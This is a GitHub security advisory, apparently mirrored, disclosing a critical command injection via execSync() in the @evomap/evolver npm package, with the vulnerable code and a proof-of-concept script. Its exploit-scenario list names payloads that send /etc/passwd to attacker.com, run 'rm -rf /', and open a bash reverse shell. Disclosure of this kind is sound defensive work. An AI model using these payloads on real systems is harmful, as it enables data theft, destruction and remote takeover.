GHSA-J5W5-568X-RQ53
Vulnerability from github – Published: 2026-04-22 22:06 – Updated: 2026-04-22 22:06Summary
A command injection vulnerability in the _extractLLM() function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to execSync() without proper sanitization, enabling remote code execution when the corpus parameter contains shell metacharacters.
Details
The vulnerability exists in src/gep/signals.js at lines 260-274:
// src/gep/signals.js:260-274
function _extractLLM(corpus, nodeSecret, hubUrl) {
// ...
var url = getHubUrl(hubUrl) + '/gep/extract';
var postData = JSON.stringify({ corpus_summary: summary });
// VULNERABLE: String concatenation into shell command
var curlCmd = 'curl -s -m 10 -X POST'
+ ' -H "Content-Type: application/json"'
+ ' -H "Authorization: Bearer ' + nodeSecret + '"'
+ ' -d ' + JSON.stringify(postData).replace(/'/g, "'\\''")
+ ' ' + JSON.stringify(url);
// VULNERABLE: Executes shell command
stdout = execSync(curlCmd, { timeout: 12000, encoding: 'utf8' });
// ...
}
The corpus parameter is derived from user input (via userSnippet in extractSignals() function) and flows through to _extractLLM() where it becomes part of the shell command. While JSON.stringify() escapes some characters, it does not prevent shell command substitution via $(...) syntax when the resulting string is passed to execSync().
The extractSignals() function is called from the main evolution loop in src/gep/evolver.js, which processes user snippets and session transcripts.
PoC
Prerequisites: - Node.js installed - Access to the evolver application
Steps to reproduce:
- Create a test file that simulates the vulnerable code path:
// test-command-injection.js
const { execSync } = require('child_process');
// Simulate the vulnerable _extractLLM function
function vulnerableExtractLLM(corpus) {
const postData = JSON.stringify({ corpus_summary: corpus });
const curlCmd = 'curl -s -m 10 -X POST'
+ ' -H "Content-Type: application/json"'
+ ' -d ' + JSON.stringify(postData).replace(/'/g, "'\\''")
+ ' http://localhost/test';
console.log('Command that would be executed:');
console.log(curlCmd);
console.log('\n--- Testing command substitution ---');
// Demonstrate that command substitution works
const testCmd = 'echo ' + JSON.stringify('$(id)');
console.log('\nTest with echo:');
console.log(execSync(testCmd, { encoding: 'utf8' }));
}
// Payload with command injection
const maliciousCorpus = '$(touch /tmp/pwned)';
vulnerableExtractLLM(maliciousCorpus);
- Run the test:
node test-command-injection.js
Expected result: The command substitution $(id) is executed by the shell, demonstrating that the same technique could be used with curl to execute arbitrary commands.
Actual exploit scenario:
If an attacker can control the userSnippet parameter that flows into extractSignals() (e.g., via compromised log files or malicious user input), they can inject shell commands like:
- $(curl attacker.com/exfil?data=$(cat /etc/passwd))
- $(rm -rf /)
- $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
Impact
This is a Remote Code Execution (RCE) vulnerability. An attacker who can control input to the extractSignals() function (whether through compromised log files, malicious user input, or other vectors) can execute arbitrary shell commands with the privileges of the Node.js process. This could lead to:
- Full system compromise
- Data exfiltration
- Installation of malware/backdoors
- Lateral movement within the network
Affected users: Anyone running the evolver with the GEP (Genetic Evolution Protocol) enabled and processing user-provided content.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@evomap/evolver"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.69.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-22T22:06:03Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\nA command injection vulnerability in the `_extractLLM()` function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to `execSync()` without proper sanitization, enabling remote code execution when the `corpus` parameter contains shell metacharacters.\n\n### Details\nThe vulnerability exists in `src/gep/signals.js` at lines 260-274:\n\n```javascript\n// src/gep/signals.js:260-274\nfunction _extractLLM(corpus, nodeSecret, hubUrl) {\n // ...\n var url = getHubUrl(hubUrl) + \u0027/gep/extract\u0027;\n var postData = JSON.stringify({ corpus_summary: summary });\n \n // VULNERABLE: String concatenation into shell command\n var curlCmd = \u0027curl -s -m 10 -X POST\u0027\n + \u0027 -H \"Content-Type: application/json\"\u0027\n + \u0027 -H \"Authorization: Bearer \u0027 + nodeSecret + \u0027\"\u0027\n + \u0027 -d \u0027 + JSON.stringify(postData).replace(/\u0027/g, \"\u0027\\\\\u0027\u0027\")\n + \u0027 \u0027 + JSON.stringify(url);\n\n // VULNERABLE: Executes shell command\n stdout = execSync(curlCmd, { timeout: 12000, encoding: \u0027utf8\u0027 });\n // ...\n}\n```\n\nThe `corpus` parameter is derived from user input (via `userSnippet` in `extractSignals()` function) and flows through to `_extractLLM()` where it becomes part of the shell command. While `JSON.stringify()` escapes some characters, it does not prevent shell command substitution via `$(...)` syntax when the resulting string is passed to `execSync()`.\n\nThe `extractSignals()` function is called from the main evolution loop in `src/gep/evolver.js`, which processes user snippets and session transcripts.\n\n### PoC\n\n**Prerequisites:**\n- Node.js installed\n- Access to the evolver application\n\n**Steps to reproduce:**\n\n1. Create a test file that simulates the vulnerable code path:\n\n```javascript\n// test-command-injection.js\nconst { execSync } = require(\u0027child_process\u0027);\n\n// Simulate the vulnerable _extractLLM function\nfunction vulnerableExtractLLM(corpus) {\n const postData = JSON.stringify({ corpus_summary: corpus });\n const curlCmd = \u0027curl -s -m 10 -X POST\u0027\n + \u0027 -H \"Content-Type: application/json\"\u0027\n + \u0027 -d \u0027 + JSON.stringify(postData).replace(/\u0027/g, \"\u0027\\\\\u0027\u0027\")\n + \u0027 http://localhost/test\u0027;\n \n console.log(\u0027Command that would be executed:\u0027);\n console.log(curlCmd);\n console.log(\u0027\\n--- Testing command substitution ---\u0027);\n \n // Demonstrate that command substitution works\n const testCmd = \u0027echo \u0027 + JSON.stringify(\u0027$(id)\u0027);\n console.log(\u0027\\nTest with echo:\u0027);\n console.log(execSync(testCmd, { encoding: \u0027utf8\u0027 }));\n}\n\n// Payload with command injection\nconst maliciousCorpus = \u0027$(touch /tmp/pwned)\u0027;\nvulnerableExtractLLM(maliciousCorpus);\n```\n\n2. Run the test:\n```bash\nnode test-command-injection.js\n```\n\n**Expected result:** The command substitution `$(id)` is executed by the shell, demonstrating that the same technique could be used with `curl` to execute arbitrary commands.\n\n**Actual exploit scenario:**\nIf an attacker can control the `userSnippet` parameter that flows into `extractSignals()` (e.g., via compromised log files or malicious user input), they can inject shell commands like:\n- `$(curl attacker.com/exfil?data=$(cat /etc/passwd))`\n- `$(rm -rf /)`\n- `$(bash -i \u003e\u0026 /dev/tcp/attacker.com/4444 0\u003e\u00261)`\n\n### Impact\nThis is a **Remote Code Execution (RCE)** vulnerability. An attacker who can control input to the `extractSignals()` function (whether through compromised log files, malicious user input, or other vectors) can execute arbitrary shell commands with the privileges of the Node.js process. This could lead to:\n- Full system compromise\n- Data exfiltration\n- Installation of malware/backdoors\n- Lateral movement within the network\n\n**Affected users:** Anyone running the evolver with the GEP (Genetic Evolution Protocol) enabled and processing user-provided content.",
"id": "GHSA-j5w5-568x-rq53",
"modified": "2026-04-22T22:06:03Z",
"published": "2026-04-22T22:06:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53"
},
{
"type": "PACKAGE",
"url": "https://github.com/EvoMap/evolver"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Evolver: Command Injection via `execSync` in `_extractLLM()` function allows Remote Code Execution"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.